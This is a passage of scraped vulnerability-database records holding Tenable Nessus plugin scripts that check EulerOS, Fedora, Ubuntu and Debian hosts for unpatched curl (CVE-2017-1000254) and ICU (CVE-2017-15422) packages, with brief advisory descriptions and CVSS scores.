undiscovered for this long could suggest that\n malformed PWD responses are rare in benign servers. We\n are not aware of any exploit of this flaw. This bug was\n introduced in commit\n [415d2e7cb7](https://github.com/curl/curl/commit/415d2e\n 7cb7), March 2005. In libcurl version 7.56.0, the\n parser always zero terminates the string but also\n rejects it if not terminated properly with a final\n double quote.(CVE-2017-1000254)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1288\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?80d36922\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected curl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libcurl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libcurl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"curl-7.29.0-35.h13\",\n \"libcurl-7.29.0-35.h13\",\n \"libcurl-devel-7.29.0-35.h13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"curl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:12:40", "description": "According to the version of the icu packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - Integer overflow in international date handling in International Components for Unicode (ICU) for C/C++ before 60.1, as used in V8 in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page.(CVE-2017-15422)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-09-28T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : icu (EulerOS-SA-2020-2099)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-15422"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libicu", "p-cpe:/a:huawei:euleros:libicu-devel", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2099.NASL", "href": "https://www.tenable.com/plugins/nessus/140866", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140866);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-15422\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : icu (EulerOS-SA-2020-2099)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the icu packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Integer overflow in international date handling in\n International Components for Unicode (ICU) for C/C++\n before 60.1, as used in V8 in Google Chrome prior to\n 63.0.3239.84 and other products, allowed a remote\n attacker to perform an out of bounds memory read via a\n crafted HTML page.(CVE-2017-15422)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2099\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?87430b0a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected icu package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libicu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libicu-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libicu-50.1.2-15.h7\",\n \"libicu-devel-50.1.2-15.h7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"icu\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-13T15:29:08", "description": "Security fix for CVE-2017-15422\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2018-09-18T00:00:00", "type": "nessus", "title": "Fedora 27 : icu (2018-1a85045c79)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-15422"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:icu", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-1A85045C79.NASL", "href": "https://www.tenable.com/plugins/nessus/117531", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-1a85045c79.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117531);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-15422\");\n script_xref(name:\"FEDORA\", value:\"2018-1a85045c79\");\n\n script_name(english:\"Fedora 27 : icu (2018-1a85045c79)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-15422\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-1a85045c79\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected icu package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:icu\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"icu-57.1-10.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"icu\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-13T15:00:09", "description": "It was discovered that ICU incorrectly handled certain calendars. If an application using ICU processed crafted data, a remote attacker could possibly cause it to crash, leading to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.10 : ICU vulnerability (USN-3610-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-15422"], "modified": "2020-09-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libicu52", "p-cpe:/a:canonical:ubuntu_linux:libicu55", "p-cpe:/a:canonical:ubuntu_linux:libicu57", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "UBUNTU_USN-3610-1.NASL", "href": "https://www.tenable.com/plugins/nessus/108708", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3610-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108708);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2017-15422\");\n script_xref(name:\"USN\", value:\"3610-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.10 : ICU vulnerability (USN-3610-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that ICU incorrectly handled certain calendars. If\nan application using ICU processed crafted data, a remote attacker\ncould possibly cause it to crash, leading to a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3610-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected libicu52, libicu55 and / or libicu57 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libicu52\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libicu55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libicu57\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libicu52\", pkgver:\"52.1-3ubuntu0.8\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libicu55\", pkgver:\"55.1-7ubuntu0.4\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libicu57\", pkgver:\"57.1-6ubuntu0.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libicu52 / libicu55 / libicu57\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-13T15:05:38", "description": "It was discovered that an integer overflow in the International Components for Unicode (ICU) library could result in denial of service and potentially the execution of arbitrary code.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2018-03-27T00:00:00", "type": "nessus", "title": "Debian DSA-4150-1 : icu - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-15422"], "modified": "2018-11-13T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:icu", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4150.NASL", "href": "https://www.tenable.com/plugins/nessus/108610", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4150. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108610);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/13 12:30:46\");\n\n script_cve_id(\"CVE-2017-15422\");\n script_xref(name:\"DSA\", value:\"4150\");\n\n script_name(english:\"Debian DSA-4150-1 : icu - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that an integer overflow in the International\nComponents for Unicode (ICU) library could result in denial of service\nand potentially the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/icu\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/icu\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/icu\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4150\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the icu packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 52.1-8+deb8u7.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 57.1-6+deb9u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icu\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"icu-devtools\", reference:\"52.1-8+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icu-doc\", reference:\"52.1-8+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libicu-dev\", reference:\"52.1-8+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libicu52\", reference:\"52.1-8+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libicu52-dbg\", reference:\"52.1-8+deb8u7\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icu-devtools\", reference:\"57.1-6+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icu-devtools-dbg\", reference:\"57.1-6+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"icu-doc\", reference:\"57.1-6+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libicu-dev\", reference:\"57.1-6+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libicu57\", reference:\"57.1-6+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libicu57-dbg\", reference:\"57.1-6+deb9u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-13T16:33:30", "description": "According to the version of the icu packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - Integer overflow in international date handling in International Components for Unicode (ICU) for C/C++ before 60.1, as used in V8 in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page.(CVE-2017-15422)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-02-24T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : icu (EulerOS-SA-2020-1106)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-15422"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libicu", "p-cpe:/a:huawei:euleros:libicu-devel", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-1106.NASL", "href": "https://www.tenable.com/plugins/nessus/133907", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133907);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-15422\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : icu (EulerOS-SA-2020-1106)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the icu packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Integer overflow in international date handling in\n International Components for Unicode (ICU) for C/C++\n before 60.1, as used in V8 in Google Chrome prior to\n 63.0.3239.84 and other products, allowed a remote\n attacker to perform an out of bounds memory read via a\n crafted HTML page.(CVE-2017-15422)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1106\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b0a64440\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected icu package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n 